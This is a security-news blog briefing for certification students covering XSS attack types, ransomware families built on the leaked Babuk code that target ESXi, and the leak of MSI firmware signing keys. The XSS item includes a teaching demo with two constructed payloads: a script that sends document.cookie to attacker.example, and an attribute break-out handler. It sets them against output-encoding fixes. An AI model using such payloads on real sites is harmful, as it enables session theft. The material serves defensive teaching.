Blog entry by Les Bell

by Les Bell - Friday, 12 May 2023, 10:23 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Tutorial Covers Three Types of XSS Attack

A rather nice little piece from Trend Micro's DevOps Resource Center provides an introduction to the three types of cross-site scripting (XSS) attacks:

  • Reflected cross-site scripting attack
  • Stored cross-site scripting attack
  • Document Object Model (DOM) cross-site scripting attack

Each of these works on the same basic principle: the threat actor gets a script of their choosing into a page that the web site serves to other users (in the reflected and stored cases via the server, in the DOM case via the page's own client-side code writing untrusted data into the document). This should be impossible if the application consistently encodes untrusted data for the context in which it is output - HTML text, attribute, URL or script - rather than relying on input sanitization alone. When a victim visits the affected page, their browser runs the script with the privileges of the site's origin: it can read session cookies or tokens, perform actions as the logged-in user, rewrite the page to phish credentials, or redirect the victim to a site that serves malware.

A good introduction for web developers, and about the right level of detail for CISSP exam candidates.
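To make the distinction concrete, here is an added example (not code from the Trend Micro article) showing how reflected and stored XSS arise from building HTML by string concatenation, and how contextual output encoding removes the problem. The templates, the in-memory comment store and the attack payloads are all constructed for the illustration.

```javascript
// Added example (not from the Trend Micro article): reflected and stored XSS
// from string-built HTML, beside the encoded versions. All inputs constructed.

// Encode a value for insertion into HTML text or a double-quoted attribute.
// Quotes are included because an attacker inside an attribute only needs a
// quote, not an angle bracket, to break out and add an event handler.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Reflected XSS: the search term arrives in the request and is echoed straight back.
function renderSearchVulnerable(query) {
  return `<p>Results for: <b>${query}</b></p>`;
}
function renderSearchSafe(query) {
  return `<p>Results for: <b>${escapeHtml(query)}</b></p>`;
}

// Same flaw in an attribute context: a leading double quote closes value="..."
// and whatever follows is parsed as further attributes of the <input>.
function renderSearchBoxVulnerable(query) {
  return `<input name="q" value="${query}">`;
}
function renderSearchBoxSafe(query) {
  return `<input name="q" value="${escapeHtml(query)}">`;
}

// Stored XSS: identical sink, but the untrusted value was persisted earlier
// (by the attacker, as a comment) and is served to every later visitor.
// A plain array stands in for the database.
function renderCommentsVulnerable(comments) {
  return '<ul>' + comments.map((c) => `<li>${c}</li>`).join('') + '</ul>';
}
function renderCommentsSafe(comments) {
  return '<ul>' + comments.map((c) => `<li>${escapeHtml(c)}</li>`).join('') + '</ul>';
}

// Element names a browser would create from the markup. A regex is adequate
// here only because the templates' own tags are fixed and known; it is a
// demonstration aid, not a sanitizer.
function tagNames(html) {
  return [...html.matchAll(/<([a-zA-Z][\w-]*)/g)].map((m) => m[1].toLowerCase());
}

// Constructed payloads: a cookie-stealing script, and an attribute break-out
// that needs no angle brackets at all.
const SCRIPT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';
const ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.domain)';

// Run every variant and report which ones let the payload change the markup.
function demo() {
  const comments = ['Nice post', SCRIPT_PAYLOAD];
  return {
    reflectedVulnerable: tagNames(renderSearchVulnerable(SCRIPT_PAYLOAD)),
    reflectedSafe: tagNames(renderSearchSafe(SCRIPT_PAYLOAD)),
    storedVulnerable: tagNames(renderCommentsVulnerable(comments)),
    storedSafe: tagNames(renderCommentsSafe(comments)),
    attributeVulnerable: renderSearchBoxVulnerable(ATTRIBUTE_PAYLOAD),
    attributeSafe: renderSearchBoxSafe(ATTRIBUTE_PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The vulnerable renderers let the payload add a `script` element or an `onfocus` handler; the encoded versions emit exactly the same template with the payload reduced to inert text. DOM-based XSS is not shown because it has no server step at all: the page's own JavaScript reads something like `location.hash` and writes it into a sink such as `innerHTML` or `document.write`, and the fix there is choosing a non-executing sink (`textContent`, `setAttribute` on a safe attribute) rather than encoding on the server. A Content Security Policy is worthwhile defence in depth for all three types, but does not replace correct output handling.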

Trend Micro DevOps Resource Center, 3 Types of Cross-Site Scripting (XSS) Attacks, web page, 11 May 2023. Available online at https://www.trendmicro.com/en_us/devops/23/e/cross-site-scripting-xss-attacks.html.

Multiple Groups Target VMware ESXi With Ransomware

Researchers at SentinelLabs have identified 10 (yes, you read that right - ten) ransomware families, all based on the source code for Babuk, which was leaked in September 2021. Babuk was one of the earliest ransomware programs to target VMware ESXi, and when one of its developers leaked the source code for its different versions - a C++ version to attack Linux systems including ESXi, a Go language version for NAS devices and a C++ version for Windows - it allowed less skilled threat actors to adapt the code for use in their own campaigns.

At first only a few groups did so, and those mostly produced Windows derivatives. But during the second half of 2022 and the beginning of 2023 things heated up, and SentinelLabs has now identified ten different ransomware families based on the Babuk source code, recognised by the reappearance of grammatically odd strings in the code as well as similar file naming conventions.

SentinelLabs identified overlap between the Babuk code and ESXi lockers attributed to Conti and REvil, and also found that they shared unique function names and features with the leaked Conti Windows locker source code. Apart from these two major ransomware players, smaller operators such as Ransom House's Mario have also made use of the Babuk code. This code reuse makes attribution of captured malware samples much more difficult: shared code no longer implies a shared operator.

The SentinelLabs report provides a full run-down of the various different derivatives, complete with comparisons of code segments. It is likely to be of most interest to malware analysts, but also provides some indicators of compromise.

Delamotte, Alex, Hypervisor Ransomware | Multiple Threat Actor Groups Hop on Leaked Babuk Code to Build ESXi Lockers, blog post, 11 May 2023. Available online at https://www.sentinelone.com/labs/hypervisor-ransomware-multiple-threat-actor-groups-hop-on-leaked-babuk-code-to-build-esxi-lockers/.

Concerns Ramp Up Over Supply Chain Attacks

The recent breach of motherboard manufacturer MSI, together with previous high-profile supply chain attacks such as SolarWinds, 3CX and others, has led to increasing concern on the part of CISOs. The Money Message ransomware gang has leaked private firmware signing keys it obtained from MSI, allowing malware developers to sign malicious firmware updates that affected boards would accept as genuine; if such an update could be inserted into the supply chain and pushed to customers, the result would be undetected very-low-level infections of millions of systems, sitting beneath the operating system and any endpoint protection running on it. A valid signature only proves that the signer held the key, not that the signer was MSI, and because trust in firmware keys is built into the platform at manufacture they cannot be rotated as easily as a leaked TLS certificate. Although there is no evidence that this has happened - so far - the possibility is concerning, if not alarming.

This concern is reflected in several recent surveys of security and IT professionals, and the message is clear: although the sky is not falling, we need to escalate efforts to secure the software supply chain.

Goodin, Dan, Leak of MSI UEFI signing keys stokes fears of “doomsday” supply chain attack, Ars Technica, 11 May 2023. Available online at https://arstechnica.com/information-technology/2023/05/leak-of-msi-uefi-signing-keys-stokes-concerns-of-doomsday-supply-chain-attack/.

Roberts, Paul, The surveys speak: supply chain threats are freaking people out, The Security Ledger, 10 May 2023. Available online at https://securityledger.com/2023/05/the-surveys-speak-supply-chain-threats-are-freaking-people-out/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
